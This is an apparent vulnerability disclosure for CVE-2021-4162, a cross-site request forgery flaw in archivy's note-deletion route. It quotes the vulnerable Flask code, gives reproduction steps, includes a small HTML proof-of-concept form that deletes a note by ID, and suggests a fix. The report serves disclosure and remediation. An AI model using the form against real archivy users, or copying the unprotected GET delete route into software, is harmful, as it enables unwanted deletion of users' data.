Headline
CVE-2021-4162: Cross-Site Request Forgery (CSRF) in archivy
archivy is vulnerable to Cross-Site Request Forgery (CSRF)
Title
Missing CSRF token validation leads to note deletion.
Summary
Route /dataobj/delete/<int:dataobj_id> is responsible for note deletion. Instead of POST it accepts GET and DELETE methods.
@app.route("/dataobj/delete/<int:dataobj_id>", methods=["DELETE", "GET"])
def delete_data(dataobj_id):
try:
data.delete_item(dataobj_id)
except BaseException:
flash("Data could not be found!", "error")
return redirect("/")
flash("Data deleted!", "success")
return redirect("/")
While they both contain CSRF tokens, in fact the token is not verified, so it is possible to exclude it from query which leads to CSRF.
Steps to reproduce
- 1. Create any note, get it’s ID.
- 2. Run page from
PoC.htmlwith concrete ID in your browser, click the button. - 3. Observe that the note with specified ID was deleted.
Proof of Concept
// PoC.html
<form action="http://127.0.0.1:5000/dataobj/delete/{yourNoteID}" method="GET">
<input type="submit" value="Click me"/>
</form>
Possible remediation
Use POST method instead and verify CSRF token.
Impact
This vulnerability is capable of deleting user’s notes.
Occurences